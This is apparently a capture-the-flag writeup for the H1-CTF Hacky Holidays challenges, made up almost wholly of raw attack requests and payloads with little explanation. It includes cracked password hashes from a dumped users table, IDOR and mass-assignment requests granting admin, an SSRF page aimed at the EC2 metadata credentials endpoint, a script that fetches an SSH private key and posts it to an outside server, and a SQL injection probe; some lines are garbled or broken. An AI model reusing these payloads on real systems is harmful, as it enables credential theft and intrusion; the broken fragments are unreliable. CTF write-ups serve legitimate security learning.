H1-CTF Hacky Holidays Writeup

Part One

<b>Warning</b>:  Undefined array key "password" in <b>/var/www/html/public/_harvester_/code/harvest.php</b> on line <b>19</b><br />
INSERT INTO `users` (`id`, `username`, `password`, `salt`, `locked`) VALUES 
(1, 'bob', '5de402c02cbf657370d179808f26d450', '564315833g', 1),
(2, 'jim', '2309467bac72082e270195f5a43303d0', 'angelae', 1),
(3, 'grinch', '0273f802f2882bcd5daf8f08a3fee512','pare���㞷�
2309467bac72082e270195f5a43303d0:angelae:austin 5de402c02cbf657370d179808f26d450:564315833g:freedom

Part Two

Part-Two Summary
$.get('api/name?id=2',function(resp){
$('#name').html( resp.value );
});
$.get('api/address?id=c81e728d9d4c2f636f067f89cc14862c',function(resp){
$('#address').html( resp.value );
});
$.get('api/position?id=eyJ1c2VyX2lkIjoyfQ==',function(resp){
$('#position').html( resp.value );
});
$.get('api/image',function(resp){
$('#profilepic').attr('src',resp.value );
});
$.get('api/salary?id=2',function(resp){
$('#salary').html( resp.value );
});
$.get('api/dob?id=2',function(resp){
$('#dob').html( resp.value );
});
{"message":"Payment Received, account upgraded"}
default.get("https://intranet.hackyholidays.h1ctf.com/api/christmasList",{headers:{Authorization:'Bearer MjJlNzA1ZDY4OWZiYzE4MTk5Mjc2NzgwNDU2MGQ0YTYgIC0K'},params:{flag:!1}})
GET /api/christmasList?flag=true HTTP/1.1 
Host: intranet.hackyholidays.h1ctf.com
Authorization:Bearer MjJlNzA1ZDY4OWZiYzE4MTk5Mjc2NzgwNDU2MGQ0YTYgIC0K

Part Three

POST  /p/../v1/users/5 HTTP/1.1
Host: c2.hackyholidays.h1ctf.com
Connection: close
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 34
email=akshansh%40example.com=>graham.rinch@this.is.h1.101.h1ctf.com"
POST /settings/ HTTP/1.1
Host: c2.hackyholidays.h1ctf.com
Cookie: candc_token=319fdd7782e96b43d5da3c5ce7be6e98
password=akshansh5%40this.is.h1.101.h1ctf.com&role=admin
POST /register/ HTTP/1.1
Host: c2.hackyholidays.h1ctf.com
email=akshansh51%40this.is.h1.101.h1ctf.com&password=akshansh51%40this.is.h1.101.h1ctf.com&c_password=akshansh51%40this.is.h1.101.h1ctf.com&role=admin
<!DOCTYPE html>
<html>
<body onload=window.location='http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance'>
</body>
</html>
<script>
async function getc2serverdata(){
response = await fetch('https://c2.hackyholidays.h1ctf.com/~/.ssh/id_rsa');
resp_value = await response.text();
await fetch('http://myserver.com', {
method: 'POST',
headers: {
'Content-Type': 'application/x-www-form-urlencoded'
},
body: JSON.stringify({
'ssrf_data': resp_value
})
});
}
send();
</script>
[core]
repositoryformatversion = 0
filemode = true
bare = false
logallrefupdates = true
[remote "origin"]
url = https://github.com/grinch-networks-two/directory-protector
fetch = +refs/heads/*:refs/remotes/origin/*
[branch "main"]
remote = origin
merge = refs/heads/main
Day Eleven Flag: Come back tomorrow for more fun :)
Request Blocked using Directory Protector
private function expectedKeyword($codewords){
$words = explode(PHP_EOL,file_get_contents($codewords));
$line = intval(date("G")) + intval(date("i"));
return $words[$line];
}
<?php$codewrd = explode("\n",file_get_contents("code.txt"));
$line = intval(date("G")) + intval(date("i"));
echo json_encode(array("authorised"=> true,"codeword"=> $codewrd[$line], "timezone" => date_default_timezone_get(),"G"=> date("G"), "i"=> date("i"), "line"=> $line));
GET /infrastructure_management/ HTTP/1.1
Host: c2.hackyholidays.h1ctf.com
Cookie: authorisation_token=eyJzZXJ2ZXIiOiAiZXhhbXBsZS5jb20vY2hhbGwucGhwIyIsICJ0b2tlbiI6ICJhIn0=
<script>let users = {};
$.get('../get_column?column=username',function(resp){
$.each(resp,function(k,v){
users[v] = true;
});
console.log(users);
});
$('.loginfrm').click(function(){
let u = $('input[name="username"]').val();
if( !users.hasOwnProperty(u) ){
alert('Username cannot be found');
return false;
}
});</script>
</body>
GET /infrastructure_management/get_column?column=SUBSTR((SELECT+INFO+FROM+information_schema.PROCESSLIST+WHERE+INFO+LIKE+'SELECT+*,SLEE%25'),1,10)

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store